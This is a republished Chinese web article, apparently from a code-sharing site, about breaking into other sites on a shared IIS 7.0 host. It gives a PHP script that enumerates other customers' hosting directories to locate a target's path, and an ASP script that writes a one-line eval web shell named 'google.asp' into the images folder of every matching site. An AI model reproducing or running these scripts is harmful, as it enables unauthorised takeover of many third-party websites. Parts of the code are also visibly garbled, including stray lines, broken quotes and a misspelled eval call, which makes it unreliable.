php一个找二层目录的小东东

发布时间：2020-05-24 17:33:32 所属栏目：PHP 来源：互联网

导读：碰到个虚拟主机,iis7.0.里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件.如果能得到目标站的物理目录,能立马搞定.但是想尽一切办法,也没找到物理路径.所以只有用脚本找了.手工找会累死的.一个php是找的,一个asp是写的

php版
<div class="codetitle"><a style="CURSOR: pointer" data="66711" class="copybut" id="copybut66711" onclick="doCopy('code66711')"> 代码如下:<div class="codebody" id="code66711">
<?php
set_time_limit(0);
$path = 'D:/Hosting';
$somefile = $_GET['key'];
$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="My Realm"');
header('HTTP/1.0 401 Unauthorized');
echo 'Text to send if user hits Cancel button';
exit;
} else {
if(is_dir($path) && is_readable($path))
{
$path2 = '';
$handle = opendir($path);
while(false !== ($filename = readdir($handle)))
{
if($filename{0} != $_GET['dir'])
{
continue;
}
/
if($filename{1} != $_GET['two'])
{
continue;
}
/
//$path2 = $path.'/'.$filename.'/html';
$path2 = $path.'/'.$filename;
if(is_dir($path2) && is_readable($path2))
{
@$handle2 = opendir($path2);
while(false !== ($filename2 = readdir($handle2)))
{
if($filename2 == $somefile)
{
//echo'[+]Found !'.$filename2."n";
file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2."n",FILE_APPEND);
}
}
@closedir($handle2);
}
}
file_put_contents($logfile,'[*]LAST '.$path2."n",FILE_APPEND);
closedir($handle);
}
}

asp版
<div class="codetitle"><a style="CURSOR: pointer" data="58425" class="copybut" id="copybut58425" onclick="doCopy('code58425')"> 代码如下:<div class="codebody" id="code58425">
<%
Server.ScriptTimeout=500000000
key = Trim(Request.QueryString("key"))
msg=" <% eval(rquese(Chr(35)))%" &">"
Set FSO=Server.CreateObject("Scripting.FileSystemObject")
Set ServerFolder=FSO.GetFolder("C:intel")
Set ServerFolderList=ServerFolder.subfolders
For Each ServerFileEvery IN ServerFolderList
' Response.write ServerFileEvery&"
"
If LCase(Left(ServerFileEvery.name,1)) = LCase(key) Then
Set sServerFolder=FSO.GetFolder(ServerFileEvery)
Set sServerFolderList=sServerFolder.subfolders
For Each sServerFileEvery IN sServerFolderList
If LCase(sServerFileEvery.name) = "images" Then
StreamSaveToFile sServerFileEvery & "google.asp",msg,"UTF-8"
End If
Next
End If
Next
Function StreamSaveToFile(sPath,sContent,sCharSet)
Dim oStream
If(InStr(sPath,":") <= 0)Then
sPath = Replace(sPath,","，")
sPath = Server.MapPath(sPath)
sPath = Replace(sPath,"，",")
End If
Set oStream = Server.CreateObject("Adodb.Stream")
With oStream
.Type = 2
.Mode = 3
.Open
.Charset = sCharSet
.WriteText sContent
.SaveToFile sPath,2
.Close
End With
Set oStream = Nothing
End Function
%>

（编辑：安卓应用网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!